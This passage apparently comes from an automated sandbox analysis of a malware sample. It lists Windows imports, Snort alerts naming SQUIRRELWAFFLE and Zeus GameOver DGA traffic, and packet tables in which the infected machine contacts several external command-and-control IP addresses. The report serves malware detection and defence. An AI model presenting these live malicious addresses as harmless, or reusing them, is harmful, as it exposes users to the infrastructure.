                                          comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          DutchNetherlands

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-20:25:48.418603TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049751107.180.44.125192.168.2.7
                                          09/27/21-20:25:48.418603TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049751107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.168261TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049754107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.168261TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049754107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.976652TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049756107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.976652TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049756107.180.44.125192.168.2.7
                                          09/27/21-20:25:51.413127TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049762107.180.44.125192.168.2.7
                                          09/27/21-20:25:51.413127TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049762107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.245924TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049764107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.245924TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049764107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.950078TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049765107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.950078TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049765107.180.44.125192.168.2.7
                                          09/27/21-20:25:53.840007TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049768107.180.44.125192.168.2.7
                                          09/27/21-20:25:53.840007TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049768107.180.44.125192.168.2.7
                                          09/27/21-20:25:54.640748TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049770107.180.44.125192.168.2.7
                                          09/27/21-20:25:54.640748TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049770107.180.44.125192.168.2.7
                                          09/27/21-20:25:55.383946TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049772107.180.44.125192.168.2.7
                                          09/27/21-20:25:55.383946TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049772107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.286302TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049774107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.286302TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049774107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.965071TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049776107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.965071TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049776107.180.44.125192.168.2.7
                                          09/27/21-20:25:57.677480TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049777107.180.44.125192.168.2.7
                                          09/27/21-20:25:57.677480TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049777107.180.44.125192.168.2.7
                                          09/27/21-20:25:58.440282TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049778107.180.44.125192.168.2.7
                                          09/27/21-20:25:58.440282TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049778107.180.44.125192.168.2.7
                                          09/27/21-20:25:59.538986TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049780107.180.44.125192.168.2.7
                                          09/27/21-20:25:59.538986TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049780107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.207879TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049781107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.207879TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049781107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.898823TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049783107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.898823TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049783107.180.44.125192.168.2.7
                                          09/27/21-20:26:02.676656TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049785107.180.44.125192.168.2.7
                                          09/27/21-20:26:02.676656TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049785107.180.44.125192.168.2.7
                                          09/27/21-20:26:03.402580TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049787107.180.44.125192.168.2.7
                                          09/27/21-20:26:03.402580TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049787107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.129306TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049789107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.129306TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049789107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.856187TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049790107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.856187TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049790107.180.44.125192.168.2.7
                                          09/27/21-20:26:05.596283TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049792107.180.44.125192.168.2.7
                                          09/27/21-20:26:05.596283TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049792107.180.44.125192.168.2.7
                                          09/27/21-20:26:05.829722UDP2018316ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses53584988.8.8.8192.168.2.7
                                          09/27/21-20:26:06.359461TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049794107.180.44.125192.168.2.7
                                          09/27/21-20:26:06.359461TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049794107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.106373TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049796107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.106373TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049796107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.873386TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049798107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.873386TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049798107.180.44.125192.168.2.7
                                          09/27/21-20:26:08.534300TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049800107.180.44.125192.168.2.7
                                          09/27/21-20:26:08.534300TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049800107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.234930TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049802107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.234930TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049802107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.906133TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049804107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.906133TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049804107.180.44.125192.168.2.7
                                          09/27/21-20:26:10.603671TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049806107.180.44.125192.168.2.7
                                          09/27/21-20:26:10.603671TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049806107.180.44.125192.168.2.7
                                          09/27/21-20:26:11.326119TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049810107.180.44.125192.168.2.7
                                          09/27/21-20:26:11.326119TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049810107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.021758TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049811107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.021758TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049811107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.714525TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049813107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.714525TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049813107.180.44.125192.168.2.7
                                          09/27/21-20:26:13.383556TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049815107.180.44.125192.168.2.7
                                          09/27/21-20:26:13.383556TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049815107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.036498TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049817107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.036498TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049817107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.689887TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049819107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.689887TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049819107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.382469TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049821107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.382469TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049821107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.999859TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049822107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.999859TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049822107.180.44.125192.168.2.7
                                          09/27/21-20:26:16.725261TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049824107.180.44.125192.168.2.7
                                          09/27/21-20:26:16.725261TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049824107.180.44.125192.168.2.7
                                          09/27/21-20:26:17.462535TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049826107.180.44.125192.168.2.7
                                          09/27/21-20:26:17.462535TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049826107.180.44.125192.168.2.7
                                          09/27/21-20:26:18.880370TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049828107.180.44.125192.168.2.7
                                          09/27/21-20:26:18.880370TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049828107.180.44.125192.168.2.7
                                          09/27/21-20:26:20.649101TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049830107.180.44.125192.168.2.7
                                          09/27/21-20:26:20.649101TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049830107.180.44.125192.168.2.7
                                          09/27/21-20:26:21.332445TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049832107.180.44.125192.168.2.7
                                          09/27/21-20:26:21.332445TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049832107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.027041TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049834107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.027041TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049834107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.728056TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049836107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.728056TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049836107.180.44.125192.168.2.7
                                          09/27/21-20:26:23.500766TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049837107.180.44.125192.168.2.7
                                          09/27/21-20:26:23.500766TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049837107.180.44.125192.168.2.7
                                          09/27/21-20:26:24.136245TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049839107.180.44.125192.168.2.7
                                          09/27/21-20:26:24.136245TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049839107.180.44.125192.168.2.7
                                          09/27/21-20:26:25.857264TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049842103.28.36.212192.168.2.7
                                          09/27/21-20:26:25.857264TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049842103.28.36.212192.168.2.7
                                          09/27/21-20:26:27.115351TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049844103.28.36.212192.168.2.7
                                          09/27/21-20:26:27.115351TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049844103.28.36.212192.168.2.7
                                          09/27/21-20:26:28.680540TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049847103.28.36.212192.168.2.7
                                          09/27/21-20:26:28.680540TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049847103.28.36.212192.168.2.7
                                          09/27/21-20:26:29.898808TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049850103.28.36.212192.168.2.7
                                          09/27/21-20:26:29.898808TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049850103.28.36.212192.168.2.7
                                          09/27/21-20:26:31.158033TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049852103.28.36.212192.168.2.7
                                          09/27/21-20:26:31.158033TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049852103.28.36.212192.168.2.7

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 20:25:46.144481897 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.194699049 CEST8049746185.67.1.94192.168.2.7
                                          Sep 27, 2021 20:25:46.194859028 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.195082903 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.195147991 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.245747089 CEST8049746185.67.1.94192.168.2.7
                                          Sep 27, 2021 20:25:46.245790005 CEST8049746185.67.1.94192.168.2.7
                                          Sep 27, 2021 20:25:46.245901108 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.680944920 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.822916985 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.823003054 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.823128939 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.823168993 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.963751078 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.965917110 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.965940952 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.966074944 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.246567011 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.386269093 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.386404991 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.386585951 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.386655092 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.527060032 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.528405905 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.528501987 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.528563976 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.839186907 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:47.943042994 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:47.943358898 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:47.943732023 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:47.943892956 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.047760010 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.086848974 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418602943 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418734074 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418809891 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418819904 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418885946 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.418900013 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.622606039 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.630883932 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.740151882 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.740442991 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.740844011 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.741065025 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.747518063 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.747824907 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.778862000 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.849224091 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.891999006 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.910649061 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.910721064 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.910866976 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.910892963 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.911207914 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:49.037647963 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:49.037811995 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:49.168261051 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.168283939 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.168427944 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.450717926 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.559809923 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.560209990 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.560353041 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.560462952 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.669806957 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.710335970 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.976651907 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.977117062 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.977582932 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:50.887948990 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:50.992923021 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:50.993057013 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.025165081 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.025198936 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.130487919 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.169555902 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.413126945 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.413139105 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.413295031 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.523477077 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.648474932 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.649390936 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.649904966 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.725169897 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.775139093 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.775542974 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.785351038 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.829341888 CEST8049764107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.829545975 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.829639912 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.829648018 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.910505056 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911261082 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911278963 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911346912 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911418915 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911439896 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911465883 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.911583900 CEST80804975323.82.140.206192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 20:25:37.432984114 CEST5873953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:37.446821928 CEST53587398.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:38.083916903 CEST6033853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:38.097866058 CEST53603388.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:38.753429890 CEST5871753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:38.765952110 CEST53587178.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:39.439172029 CEST5976253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:39.457262039 CEST53597628.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:40.099864006 CEST5432953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:40.112871885 CEST53543298.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:40.743468046 CEST5805253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:40.756434917 CEST53580528.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:41.384598017 CEST5400853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:41.398580074 CEST53540088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:42.328867912 CEST5945153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:42.341958046 CEST53594518.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:43.005732059 CEST5291453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:43.019460917 CEST53529148.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:44.334573030 CEST6456953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:44.348117113 CEST53645698.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:46.070871115 CEST5281653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:46.122905970 CEST53528168.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:46.448447943 CEST5078153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:46.477045059 CEST53507818.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:46.482814074 CEST5423053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:46.642173052 CEST53542308.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:46.744265079 CEST5491153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:46.758444071 CEST53549118.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:47.172194958 CEST4995853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:47.184863091 CEST53499588.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:47.491842031 CEST5086053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:47.504626989 CEST53508608.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:47.760514975 CEST5045253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:47.781789064 CEST53504528.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:47.791491985 CEST5973053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:47.826519966 CEST53597308.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:48.346420050 CEST5931053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:48.361349106 CEST53593108.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:48.569694042 CEST5191953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:48.585489988 CEST53519198.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:48.591152906 CEST6429653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:48.621702909 CEST53642968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:48.994673967 CEST5668053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.007340908 CEST53566808.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:49.374650002 CEST5882053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.407346964 CEST53588208.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:49.419563055 CEST6098353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.429651976 CEST4924753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.445404053 CEST53609838.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:49.454132080 CEST53492478.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:49.470479965 CEST5228653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.483572006 CEST53522868.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:49.510529995 CEST5606453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.538041115 CEST53560648.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:49.757011890 CEST6374453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:49.775023937 CEST53637448.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:50.363708973 CEST6145753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:50.391757965 CEST53614578.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:50.396615982 CEST5836753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:50.409461975 CEST53583678.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:51.680702925 CEST6059953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:51.694057941 CEST53605998.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:51.699728966 CEST5957153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:51.713299990 CEST53595718.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:52.387361050 CEST5268953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:52.400687933 CEST53526898.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:52.406748056 CEST5029053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:52.419859886 CEST53502908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:52.523611069 CEST6042753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:52.537311077 CEST53604278.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:52.848834038 CEST5620953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:52.869965076 CEST53562098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:53.092384100 CEST5958253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:53.120194912 CEST53595828.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:53.127259970 CEST6094953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:53.141144037 CEST53609498.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:54.020759106 CEST5854253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:54.043450117 CEST53585428.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:54.086182117 CEST5917953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:54.108280897 CEST53591798.8.8.8192.168.2.7
